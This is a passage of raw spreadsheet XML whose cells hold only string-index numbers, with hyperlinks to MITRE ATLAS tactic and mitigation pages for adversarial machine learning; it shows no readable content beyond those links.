        <v>639</v>
      </c>
      <c r="E10" s="37" t="s">
        <v>640</v>
      </c>
      <c r="F10" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G10" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="11" ht="150" spans="1:7">
      <c r="A11" s="32" t="s">
        <v>641</v>
      </c>
      <c r="B11" s="32" t="s">
        <v>642</v>
      </c>
      <c r="C11" s="32" t="s">
        <v>28</v>
      </c>
      <c r="D11" s="36" t="s">
        <v>643</v>
      </c>
      <c r="E11" s="37" t="s">
        <v>644</v>
      </c>
      <c r="F11" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G11" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="12" ht="135" spans="1:7">
      <c r="A12" s="32" t="s">
        <v>645</v>
      </c>
      <c r="B12" s="32" t="s">
        <v>646</v>
      </c>
      <c r="C12" s="32" t="s">
        <v>40</v>
      </c>
      <c r="D12" s="36" t="s">
        <v>647</v>
      </c>
      <c r="E12" s="37" t="s">
        <v>648</v>
      </c>
      <c r="F12" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G12" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="13" ht="90" spans="1:7">
      <c r="A13" s="32" t="s">
        <v>649</v>
      </c>
      <c r="B13" s="32" t="s">
        <v>650</v>
      </c>
      <c r="C13" s="32" t="s">
        <v>365</v>
      </c>
      <c r="D13" s="36" t="s">
        <v>651</v>
      </c>
      <c r="E13" s="37" t="s">
        <v>652</v>
      </c>
      <c r="F13" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G13" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="14" ht="225" spans="1:7">
      <c r="A14" s="32" t="s">
        <v>653</v>
      </c>
      <c r="B14" s="32" t="s">
        <v>654</v>
      </c>
      <c r="C14" s="32" t="s">
        <v>655</v>
      </c>
      <c r="D14" s="36" t="s">
        <v>656</v>
      </c>
      <c r="E14" s="37" t="s">
        <v>657</v>
      </c>
      <c r="F14" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G14" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="15" ht="165" spans="1:7">
      <c r="A15" s="32" t="s">
        <v>658</v>
      </c>
      <c r="B15" s="32" t="s">
        <v>659</v>
      </c>
      <c r="C15" s="32" t="s">
        <v>66</v>
      </c>
      <c r="D15" s="36" t="s">
        <v>660</v>
      </c>
      <c r="E15" s="37" t="s">
        <v>661</v>
      </c>
      <c r="F15" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G15" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="16" ht="105" spans="1:7">
      <c r="A16" s="32" t="s">
        <v>662</v>
      </c>
      <c r="B16" s="32" t="s">
        <v>663</v>
      </c>
      <c r="C16" s="32" t="s">
        <v>22</v>
      </c>
      <c r="D16" s="36" t="s">
        <v>664</v>
      </c>
      <c r="E16" s="37" t="s">
        <v>665</v>
      </c>
      <c r="F16" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G16" s="32" t="s">
        <v>14</v>
      </c>
    </row>
  </sheetData>
  <hyperlinks>
    <hyperlink ref="E2" r:id="rId1" display="https://atlas.mitre.org/tactics/AML.TA0001"/>
    <hyperlink ref="E3" r:id="rId2" display="https://atlas.mitre.org/tactics/AML.TA0000"/>
    <hyperlink ref="E4" r:id="rId3" display="https://atlas.mitre.org/tactics/AML.TA0009"/>
    <hyperlink ref="E5" r:id="rId4" display="https://atlas.mitre.org/tactics/AML.TA0014"/>
    <hyperlink ref="E6" r:id="rId5" display="https://atlas.mitre.org/tactics/AML.TA0013"/>
    <hyperlink ref="E7" r:id="rId6" display="https://atlas.mitre.org/tactics/AML.TA0007"/>
    <hyperlink ref="E8" r:id="rId7" display="https://atlas.mitre.org/tactics/AML.TA0008"/>
    <hyperlink ref="E9" r:id="rId8" display="https://atlas.mitre.org/tactics/AML.TA0005"/>
    <hyperlink ref="E10" r:id="rId9" display="https://atlas.mitre.org/tactics/AML.TA0010"/>
    <hyperlink ref="E11" r:id="rId10" display="https://atlas.mitre.org/tactics/AML.TA0011"/>
    <hyperlink ref="E12" r:id="rId11" display="https://atlas.mitre.org/tactics/AML.TA0004"/>
    <hyperlink ref="E13" r:id="rId12" display="https://atlas.mitre.org/tactics/AML.TA0006"/>
    <hyperlink ref="E14" r:id="rId13" display="https://atlas.mitre.org/tactics/AML.TA0012"/>
    <hyperlink ref="E15" r:id="rId14" display="https://atlas.mitre.org/tactics/AML.TA0002"/>
    <hyperlink ref="E16" r:id="rId15" display="https://atlas.mitre.org/tactics/AML.TA0003"/>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workbookViewId="0">
      <selection activeCell="A1" sqref="A1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="15" outlineLevelCol="7"/>
  <cols>
    <col min="1" max="1" width="13.4444444444444" style="27" customWidth="1"/>
    <col min="2" max="2" width="68" style="27" customWidth="1"/>
    <col min="3" max="3" width="56.8888888888889" style="27" customWidth="1"/>
    <col min="4" max="4" width="91.8888888888889" style="34" customWidth="1"/>
    <col min="5" max="5" width="52.2222222222222" style="34" customWidth="1"/>
    <col min="6" max="6" width="15.4444444444444" style="27" customWidth="1"/>
    <col min="7" max="7" width="15.8888888888889" style="27" customWidth="1"/>
    <col min="8" max="8" width="25.4444444444444" style="27" customWidth="1"/>
    <col min="9" max="16384" width="9" style="27"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8">
      <c r="A1" s="29" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="29" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="29" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="35" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="35" t="s">
        <v>4</v>
      </c>
      <c r="F1" s="29" t="s">
        <v>5</v>
      </c>
      <c r="G1" s="29" t="s">
        <v>6</v>
      </c>
      <c r="H1" s="29" t="s">
        <v>666</v>
      </c>
    </row>
    <row r="2" ht="105" spans="1:7">
      <c r="A2" s="32" t="s">
        <v>667</v>
      </c>
      <c r="B2" s="32" t="s">
        <v>668</v>
      </c>
      <c r="C2" s="32" t="s">
        <v>669</v>
      </c>
      <c r="D2" s="36" t="s">
        <v>670</v>
      </c>
      <c r="E2" s="37" t="s">
        <v>671</v>
      </c>
      <c r="F2" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G2" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="3" ht="75" spans="1:7">
      <c r="A3" s="32" t="s">
        <v>672</v>
      </c>
      <c r="B3" s="32" t="s">
        <v>673</v>
      </c>
      <c r="C3" s="32" t="s">
        <v>674</v>
      </c>
      <c r="D3" s="36" t="s">
        <v>675</v>
      </c>
      <c r="E3" s="37" t="s">
        <v>676</v>
      </c>
      <c r="F3" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G3" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="4" ht="75" spans="1:7">
      <c r="A4" s="32" t="s">
        <v>677</v>
      </c>
      <c r="B4" s="32" t="s">
        <v>678</v>
      </c>
      <c r="C4" s="32" t="s">
        <v>679</v>
      </c>
      <c r="D4" s="36" t="s">
        <v>680</v>
      </c>
      <c r="E4" s="37" t="s">
        <v>681</v>
      </c>
      <c r="F4" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G4" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="5" ht="60" spans="1:7">
      <c r="A5" s="32" t="s">
        <v>682</v>
      </c>
      <c r="B5" s="32" t="s">
        <v>683</v>
      </c>
      <c r="C5" s="32" t="s">
        <v>684</v>
      </c>
      <c r="D5" s="36" t="s">
        <v>685</v>
      </c>
      <c r="E5" s="37" t="s">
        <v>686</v>
      </c>
      <c r="F5" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G5" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="6" ht="60" spans="1:7">
      <c r="A6" s="32" t="s">
        <v>687</v>
      </c>
      <c r="B6" s="32" t="s">
        <v>688</v>
      </c>
      <c r="C6" s="32" t="s">
        <v>689</v>
      </c>
      <c r="D6" s="36" t="s">
        <v>690</v>
      </c>
      <c r="E6" s="37" t="s">
        <v>691</v>
      </c>
      <c r="F6" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G6" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="7" ht="45" spans="1:7">
      <c r="A7" s="32" t="s">
        <v>692</v>
      </c>
      <c r="B7" s="32" t="s">
        <v>693</v>
      </c>
      <c r="C7" s="32" t="s">
        <v>694</v>
      </c>
      <c r="D7" s="36" t="s">
        <v>695</v>
      </c>
      <c r="E7" s="37" t="s">
        <v>696</v>
      </c>
      <c r="F7" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G7" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="8" ht="60" spans="1:7">
      <c r="A8" s="32" t="s">
        <v>697</v>
      </c>
      <c r="B8" s="32" t="s">
        <v>698</v>
      </c>
      <c r="C8" s="32" t="s">
        <v>699</v>
      </c>
      <c r="D8" s="36" t="s">
        <v>700</v>
      </c>
      <c r="E8" s="37" t="s">
        <v>701</v>
      </c>
      <c r="F8" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G8" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="9" ht="30" spans="1:7">
      <c r="A9" s="32" t="s">
        <v>702</v>
      </c>
      <c r="B9" s="32" t="s">
        <v>703</v>
      </c>
      <c r="C9" s="32" t="s">
        <v>704</v>
      </c>
      <c r="D9" s="36" t="s">
        <v>705</v>
      </c>
      <c r="E9" s="37" t="s">
        <v>706</v>
      </c>
      <c r="F9" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G9" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="10" ht="105" spans="1:7">
      <c r="A10" s="32" t="s">
        <v>707</v>
      </c>
      <c r="B10" s="32" t="s">
        <v>708</v>
      </c>
      <c r="C10" s="32" t="s">
        <v>709</v>
      </c>
      <c r="D10" s="36" t="s">
        <v>710</v>
      </c>
      <c r="E10" s="37" t="s">
        <v>711</v>
      </c>
      <c r="F10" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G10" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="11" ht="90" spans="1:7">
      <c r="A11" s="32" t="s">
        <v>712</v>
      </c>
      <c r="B11" s="32" t="s">
        <v>713</v>
      </c>
      <c r="C11" s="32" t="s">
        <v>714</v>
      </c>
      <c r="D11" s="36" t="s">
        <v>715</v>
      </c>
      <c r="E11" s="37" t="s">
        <v>716</v>
      </c>
      <c r="F11" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G11" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="12" ht="105" spans="1:7">
      <c r="A12" s="32" t="s">
        <v>717</v>
      </c>
      <c r="B12" s="32" t="s">
        <v>718</v>
      </c>
      <c r="C12" s="32" t="s">
        <v>719</v>
      </c>
      <c r="D12" s="36" t="s">
        <v>720</v>
      </c>
      <c r="E12" s="37" t="s">
        <v>721</v>
      </c>
      <c r="F12" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G12" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="13" ht="30" spans="1:7">
      <c r="A13" s="32" t="s">
        <v>722</v>
      </c>
      <c r="B13" s="32" t="s">
        <v>723</v>
      </c>
      <c r="C13" s="32" t="s">
        <v>724</v>
      </c>
      <c r="D13" s="36" t="s">
        <v>725</v>
      </c>
      <c r="E13" s="37" t="s">
        <v>726</v>
      </c>
      <c r="F13" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G13" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="14" ht="60" spans="1:7">
      <c r="A14" s="32" t="s">
        <v>727</v>
      </c>
      <c r="B14" s="32" t="s">
        <v>728</v>
      </c>
      <c r="C14" s="32" t="s">
        <v>729</v>
      </c>
      <c r="D14" s="36" t="s">
        <v>730</v>
      </c>
      <c r="E14" s="37" t="s">
        <v>731</v>
      </c>
      <c r="F14" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G14" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="15" ht="90" spans="1:7">
      <c r="A15" s="32" t="s">
        <v>732</v>
      </c>
      <c r="B15" s="32" t="s">
        <v>733</v>
      </c>
      <c r="C15" s="32" t="s">
        <v>734</v>
      </c>
      <c r="D15" s="36" t="s">
        <v>735</v>
      </c>
      <c r="E15" s="37" t="s">
        <v>736</v>
      </c>
      <c r="F15" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G15" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="16" ht="30" spans="1:7">
      <c r="A16" s="32" t="s">
        <v>737</v>
      </c>
      <c r="B16" s="32" t="s">
        <v>738</v>
      </c>
      <c r="C16" s="32" t="s">
        <v>739</v>
      </c>
      <c r="D16" s="36" t="s">
        <v>740</v>
      </c>
      <c r="E16" s="37" t="s">
        <v>741</v>
      </c>
      <c r="F16" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G16" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="17" ht="30" spans="1:7">
      <c r="A17" s="32" t="s">
        <v>742</v>
      </c>
      <c r="B17" s="32" t="s">
        <v>743</v>
      </c>
      <c r="C17" s="32" t="s">
        <v>744</v>
      </c>
      <c r="D17" s="36" t="s">
        <v>745</v>
      </c>
      <c r="E17" s="37" t="s">
        <v>746</v>
      </c>
      <c r="F17" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G17" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="18" ht="45" spans="1:7">
      <c r="A18" s="32" t="s">
        <v>747</v>
      </c>
      <c r="B18" s="32" t="s">
        <v>748</v>
      </c>
      <c r="C18" s="32" t="s">
        <v>749</v>
      </c>
      <c r="D18" s="36" t="s">
        <v>750</v>
      </c>
      <c r="E18" s="37" t="s">
        <v>751</v>
      </c>
      <c r="F18" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G18" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="19" ht="90" spans="1:7">
      <c r="A19" s="32" t="s">
        <v>752</v>
      </c>
      <c r="B19" s="32" t="s">
        <v>753</v>
      </c>
      <c r="C19" s="32" t="s">
        <v>754</v>
      </c>
      <c r="D19" s="36" t="s">
        <v>755</v>
      </c>
      <c r="E19" s="37" t="s">
        <v>756</v>
      </c>
      <c r="F19" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G19" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="20" ht="30" spans="1:7">
      <c r="A20" s="32" t="s">
        <v>757</v>
      </c>
      <c r="B20" s="32" t="s">
        <v>758</v>
      </c>
      <c r="C20" s="32" t="s">
        <v>759</v>
      </c>
      <c r="D20" s="36" t="s">
        <v>760</v>
      </c>
      <c r="E20" s="37" t="s">
        <v>761</v>
      </c>
      <c r="F20" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G20" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="21" ht="90" spans="1:7">
      <c r="A21" s="32" t="s">
        <v>762</v>
      </c>
      <c r="B21" s="32" t="s">
        <v>763</v>
      </c>
      <c r="C21" s="32" t="s">
        <v>764</v>
      </c>
      <c r="D21" s="36" t="s">
        <v>765</v>
      </c>
      <c r="E21" s="37" t="s">
        <v>766</v>
      </c>
      <c r="F21" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G21" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="22" ht="45" spans="1:7">
      <c r="A22" s="32" t="s">
        <v>767</v>
      </c>
      <c r="B22" s="32" t="s">
        <v>768</v>
      </c>
      <c r="C22" s="32" t="s">
        <v>769</v>
      </c>
      <c r="D22" s="36" t="s">
        <v>770</v>
      </c>
      <c r="E22" s="37" t="s">
        <v>771</v>
      </c>
      <c r="F22" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G22" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="23" ht="45" spans="1:7">
      <c r="A23" s="32" t="s">
        <v>772</v>
      </c>
      <c r="B23" s="32" t="s">
        <v>773</v>
      </c>
      <c r="C23" s="32" t="s">
        <v>774</v>
      </c>
      <c r="D23" s="36" t="s">
        <v>775</v>
      </c>
      <c r="E23" s="37" t="s">
        <v>776</v>
      </c>
      <c r="F23" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G23" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="24" spans="1:7">
      <c r="A24" s="32" t="s">
        <v>777</v>
      </c>
      <c r="B24" s="32" t="s">
        <v>778</v>
      </c>
      <c r="C24" s="32" t="s">
        <v>779</v>
      </c>
      <c r="D24" s="36" t="s">
        <v>780</v>
      </c>
      <c r="E24" s="37" t="s">
        <v>781</v>
      </c>
      <c r="F24" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G24" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="25" ht="60" spans="1:7">
      <c r="A25" s="32" t="s">
        <v>782</v>
      </c>
      <c r="B25" s="32" t="s">
        <v>783</v>
      </c>
      <c r="C25" s="32" t="s">
        <v>784</v>
      </c>
      <c r="D25" s="36" t="s">
        <v>785</v>
      </c>
      <c r="E25" s="37" t="s">
        <v>786</v>
      </c>
      <c r="F25" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G25" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="26" ht="30" spans="1:7">
      <c r="A26" s="32" t="s">
        <v>787</v>
      </c>
      <c r="B26" s="32" t="s">
        <v>788</v>
      </c>
      <c r="C26" s="32" t="s">
        <v>789</v>
      </c>
      <c r="D26" s="36" t="s">
        <v>790</v>
      </c>
      <c r="E26" s="37" t="s">
        <v>791</v>
      </c>
      <c r="F26" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G26" s="32" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="27" ht="165" spans="1:7">
      <c r="A27" s="32" t="s">
        <v>792</v>
      </c>
      <c r="B27" s="32" t="s">
        <v>793</v>
      </c>
      <c r="C27" s="32" t="s">
        <v>794</v>
      </c>
      <c r="D27" s="36" t="s">
        <v>795</v>
      </c>
      <c r="E27" s="37" t="s">
        <v>796</v>
      </c>
      <c r="F27" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G27" s="32" t="s">
        <v>14</v>
      </c>
    </row>
  </sheetData>
  <hyperlinks>
    <hyperlink ref="E2" r:id="rId1" display="https://atlas.mitre.org/mitigations/AML.M0023"/>
    <hyperlink ref="E3" r:id="rId2" display="https://atlas.mitre.org/mitigations/AML.M0017"/>
    <hyperlink ref="E4" r:id="rId3" display="https://atlas.mitre.org/mitigations/AML.M0024"/>
    <hyperlink ref="E5" r:id="rId4" display="https://atlas.mitre.org/mitigations/AML.M0015"/>
    <hyperlink ref="E6" r:id="rId5" display="https://atlas.mitre.org/mitigations/AML.M0013"/>
    <hyperlink ref="E7" r:id="rId6" display="https://atlas.mitre.org/mitigations/AML.M0005"/>
    <hyperlink ref="E8" r:id="rId7" display="https://atlas.mitre.org/mitigations/AML.M0019"/>
    <hyperlink ref="E9" r:id="rId8" display="https://atlas.mitre.org/mitigations/AML.M0012"/>
    <hyperlink ref="E10" r:id="rId9" display="https://atlas.mitre.org/mitigations/AML.M0020"/>
    <hyperlink ref="E11" r:id="rId10" display="https://atlas.mitre.org/mitigations/AML.M0021"/>
    <hyperlink ref="E12" r:id="rId11" display="https://atlas.mitre.org/mitigations/AML.M0022"/>
    <hyperlink ref="E13" r:id="rId12" display="https://atlas.mitre.org/mitigations/AML.M0010"/>
    <hyperlink ref="E14" r:id="rId13" display="https://atlas.mitre.org/mitigations/AML.M0001"/>
    <hyperlink ref="E15" r:id="rId14" display="https://atlas.mitre.org/mitigations/AML.M0000"/>
    <hyperlink ref="E16" r:id="rId15" display="https://atlas.mitre.org/mitigations/AML.M0025"/>
    <hyperlink ref="E17" r:id="rId16" display="https://atlas.mitre.org/mitigations/AML.M0003"/>
    <hyperlink ref="E18" r:id="rId17" display="https://atlas.mitre.org/mitigations/AML.M0002"/>
    <hyperlink ref="E19" r:id="rId18" display="https://atlas.mitre.org/mitigations/AML.M0011"/>
    <hyperlink ref="E20" r:id="rId19" display="https://atlas.mitre.org/mitigations/AML.M0004"/>
    <hyperlink ref="E21" r:id="rId20" display="https://atlas.mitre.org/mitigations/AML.M0007"/>
    <hyperlink ref="E22" r:id="rId21" display="https://atlas.mitre.org/mitigations/AML.M0006"/>
    <hyperlink ref="E23" r:id="rId22" display="https://atlas.mitre.org/mitigations/AML.M0009"/>
    <hyperlink ref="E24" r:id="rId23" display="https://atlas.mitre.org/mitigations/AML.M0018"/>
    <hyperlink ref="E25" r:id="rId24" display="https://atlas.mitre.org/mitigations/AML.M0008"/>
    <hyperlink ref="E26" r:id="rId25" display="https://atlas.mitre.org/mitigations/AML.M0014"/>
    <hyperlink ref="E27" r:id="rId26" display="https://atlas.mitre.org/mitigations/AML.M0016"/>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workbookViewId="0">
      <selection activeCell="A1" sqref="A1:B1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="15"/>
  <cols>
    <col min="1" max="1" width="20.712962962963" style="25" customWidth="1"/>
    <col min="2" max="2" width="20.712962962963" style="26" customWidth="1"/>
    <col min="3" max="3" width="20.712962962963" style="25" customWidth="1"/>
    <col min="4" max="4" width="20.712962962963" style="26" customWidth="1"/>
    <col min="5" max="5" width="20.712962962963" style="25" customWidth="1"/>
    <col min="6" max="6" width="20.712962962963" style="26" customWidth="1"/>
    <col min="7" max="7" width="20.712962962963" style="27" customWidth="1"/>
    <col min="8" max="8" width="20.712962962963" style="25" customWidth="1"/>
    <col min="9" max="9" width="20.712962962963" style="26" customWidth="1"/>
    <col min="10" max="10" width="20.712962962963" style="25" customWidth="1"/>
    <col min="11" max="11" width="20.712962962963" style="26" customWidth="1"/>
    <col min="12" max="12" width="20.712962962963" style="27" customWidth="1"/>
    <col min="13" max="13" width="20.712962962963" style="25" customWidth="1"/>
    <col min="14" max="14" width="20.712962962963" style="26" customWidth="1"/>
    <col min="15" max="15" width="20.712962962963" style="27" customWidth="1"/>
    <col min="16" max="16" width="20.712962962963" style="25" customWidth="1"/>
    <col min="17" max="17" width="20.712962962963" style="26" customWidth="1"/>
    <col min="18" max="18" width="20.712962962963" style="27" customWidth="1"/>
    <col min="19" max="19" width="20.712962962963" style="25" customWidth="1"/>
    <col min="20" max="20" width="20.712962962963" style="26" customWidth="1"/>
    <col min="21" max="21" width="20.712962962963" style="27" customWidth="1"/>
    <col min="22" max="22" width="20.712962962963" style="25" customWidth="1"/>
    <col min="23" max="23" width="20.712962962963" style="26" customWidth="1"/>
    <col min="24" max="24" width="20.712962962963" style="25" customWidth="1"/>
    <col min="25" max="25" width="20.712962962963" style="26" customWidth="1"/>
    <col min="26" max="26" width="20.712962962963" style="27" customWidth="1"/>
    <col min="27" max="16384" width="9" style="27"/>
  </cols>
  <sheetData>
    <row r="1" ht="18.6" spans="1:25">
      <c r="A1" s="28" t="s">
        <v>66</v>
      </c>
      <c r="B1" s="28"/>
      <c r="C1" s="28" t="s">
        <v>22</v>
      </c>
      <c r="D1" s="28"/>
      <c r="E1" s="28" t="s">
        <v>40</v>
      </c>
      <c r="F1" s="28"/>
      <c r="G1" s="29" t="s">
        <v>34</v>
      </c>
      <c r="H1" s="28" t="s">
        <v>105</v>
      </c>
      <c r="I1" s="28"/>
      <c r="J1" s="28" t="s">
        <v>365</v>
      </c>
      <c r="K1" s="28"/>
      <c r="L1" s="29" t="s">
        <v>655</v>
      </c>
      <c r="M1" s="28" t="s">
        <v>93</v>
      </c>
      <c r="N1" s="28"/>
      <c r="O1" s="29" t="s">
        <v>574</v>
      </c>
      <c r="P1" s="28" t="s">
        <v>99</v>
      </c>
      <c r="Q1" s="28"/>
      <c r="R1" s="29" t="s">
        <v>15</v>
      </c>
      <c r="S1" s="28" t="s">
        <v>82</v>
      </c>
      <c r="T1" s="28"/>
      <c r="U1" s="29" t="s">
        <v>483</v>
      </c>
      <c r="V1" s="28" t="s">
        <v>242</v>
      </c>
      <c r="W1" s="28"/>
      <c r="X1" s="28" t="s">
        <v>28</v>
      </c>
      <c r="Y1" s="28"/>
    </row>
    <row r="2" spans="1:24">
      <c r="A2" s="30" t="s">
        <v>63</v>
      </c>
      <c r="C2" s="22" t="s">
        <v>53</v>
      </c>
      <c r="D2" s="31" t="s">
        <v>19</v>
      </c>
      <c r="E2" s="22" t="s">
        <v>43</v>
      </c>
      <c r="F2" s="31" t="s">
        <v>37</v>
      </c>
      <c r="G2" s="32" t="s">
        <v>31</v>
      </c>
      <c r="H2" s="30" t="s">
        <v>102</v>
      </c>
      <c r="J2" s="30" t="s">
        <v>362</v>
      </c>
      <c r="L2" s="32" t="s">
        <v>335</v>
      </c>
      <c r="M2" s="30" t="s">
        <v>118</v>
      </c>
      <c r="O2" s="32" t="s">
        <v>571</v>
      </c>
      <c r="P2" s="30" t="s">
        <v>96</v>
      </c>
      <c r="R2" s="32" t="s">
        <v>11</v>
      </c>
      <c r="S2" s="22" t="s">
        <v>128</v>
      </c>
      <c r="T2" s="31" t="s">
        <v>79</v>
      </c>
      <c r="U2" s="32" t="s">
        <v>480</v>
      </c>
      <c r="V2" s="22" t="s">
        <v>239</v>
      </c>
      <c r="W2" s="31" t="s">
        <v>260</v>
      </c>
      <c r="X2" s="30" t="s">
        <v>123</v>
      </c>
    </row>
    <row r="3" spans="1:24">
      <c r="A3" s="30" t="s">
        <v>285</v>
      </c>
      <c r="C3" s="33"/>
      <c r="D3" s="31" t="s">
        <v>108</v>
      </c>
      <c r="E3" s="33"/>
      <c r="F3" s="31" t="s">
        <v>138</v>
      </c>
      <c r="G3" s="32" t="s">
        <v>48</v>
      </c>
      <c r="H3" s="30" t="s">
        <v>341</v>
      </c>
      <c r="J3" s="22" t="s">
        <v>383</v>
      </c>
      <c r="K3" s="31" t="s">
        <v>409</v>
      </c>
      <c r="L3" s="32" t="s">
        <v>341</v>
      </c>
      <c r="M3" s="30" t="s">
        <v>233</v>
      </c>
      <c r="P3" s="30" t="s">
        <v>173</v>
      </c>
      <c r="R3" s="32" t="s">
        <v>143</v>
      </c>
      <c r="S3" s="33"/>
      <c r="T3" s="31" t="s">
        <v>85</v>
      </c>
      <c r="V3" s="33"/>
      <c r="W3" s="31" t="s">
        <v>310</v>
      </c>
      <c r="X3" s="30" t="s">
        <v>158</v>
      </c>
    </row>
    <row r="4" spans="1:24">
      <c r="A4" s="30" t="s">
        <v>486</v>
      </c>
      <c r="C4" s="22" t="s">
        <v>58</v>
      </c>
      <c r="D4" s="31" t="s">
        <v>153</v>
      </c>
      <c r="E4" s="33"/>
      <c r="F4" s="31" t="s">
        <v>295</v>
      </c>
      <c r="G4" s="32" t="s">
        <v>280</v>
      </c>
      <c r="H4" s="22" t="s">
        <v>352</v>
      </c>
      <c r="I4" s="31" t="s">
        <v>168</v>
      </c>
      <c r="J4" s="33"/>
      <c r="K4" s="31" t="s">
        <v>434</v>
      </c>
      <c r="M4" s="22" t="s">
        <v>270</v>
      </c>
      <c r="N4" s="31" t="s">
        <v>90</v>
      </c>
      <c r="P4" s="30" t="s">
        <v>178</v>
      </c>
      <c r="R4" s="32" t="s">
        <v>148</v>
      </c>
      <c r="S4" s="33"/>
      <c r="T4" s="31" t="s">
        <v>315</v>
      </c>
      <c r="V4" s="33"/>
      <c r="W4" s="31" t="s">
        <v>320</v>
      </c>
      <c r="X4" s="30" t="s">
        <v>218</v>
      </c>
    </row>
    <row r="5" spans="1:25">
      <c r="A5" s="30" t="s">
        <v>491</v>
      </c>
      <c r="C5" s="33"/>
      <c r="D5" s="31" t="s">
        <v>404</v>
      </c>
      <c r="E5" s="33"/>
      <c r="F5" s="31" t="s">
        <v>399</v>
      </c>
      <c r="G5" s="32" t="s">
        <v>429</v>
      </c>
      <c r="H5" s="33"/>
      <c r="I5" s="31" t="s">
        <v>305</v>
      </c>
      <c r="J5" s="30" t="s">
        <v>439</v>
      </c>
      <c r="M5" s="33"/>
      <c r="N5" s="31" t="s">
        <v>113</v>
      </c>
      <c r="P5" s="30" t="s">
        <v>183</v>
      </c>
      <c r="S5" s="33"/>
      <c r="T5" s="31" t="s">
        <v>389</v>
      </c>
      <c r="V5" s="30" t="s">
        <v>245</v>
      </c>
      <c r="X5" s="30" t="s">
        <v>223</v>
      </c>
      <c r="Y5" s="31" t="s">
        <v>378</v>
      </c>
    </row>
    <row r="6" spans="1:24">
      <c r="A6" s="22" t="s">
        <v>496</v>
      </c>
      <c r="B6" s="31" t="s">
        <v>325</v>
      </c>
      <c r="C6" s="30" t="s">
        <v>163</v>
      </c>
      <c r="D6" s="31" t="s">
        <v>74</v>
      </c>
      <c r="E6" s="30" t="s">
        <v>208</v>
      </c>
      <c r="H6" s="30" t="s">
        <v>582</v>
      </c>
      <c r="I6" s="31" t="s">
        <v>566</v>
      </c>
      <c r="J6" s="30" t="s">
        <v>465</v>
      </c>
      <c r="M6" s="33"/>
      <c r="N6" s="31" t="s">
        <v>213</v>
      </c>
      <c r="P6" s="30" t="s">
        <v>188</v>
      </c>
      <c r="Q6" s="31" t="s">
        <v>290</v>
      </c>
      <c r="S6" s="33"/>
      <c r="T6" s="31" t="s">
        <v>602</v>
      </c>
      <c r="V6" s="30" t="s">
        <v>265</v>
      </c>
      <c r="X6" s="30" t="s">
        <v>233</v>
      </c>
    </row>
    <row r="7" spans="1:25">
      <c r="A7" s="33"/>
      <c r="B7" s="31" t="s">
        <v>445</v>
      </c>
      <c r="C7" s="30" t="s">
        <v>228</v>
      </c>
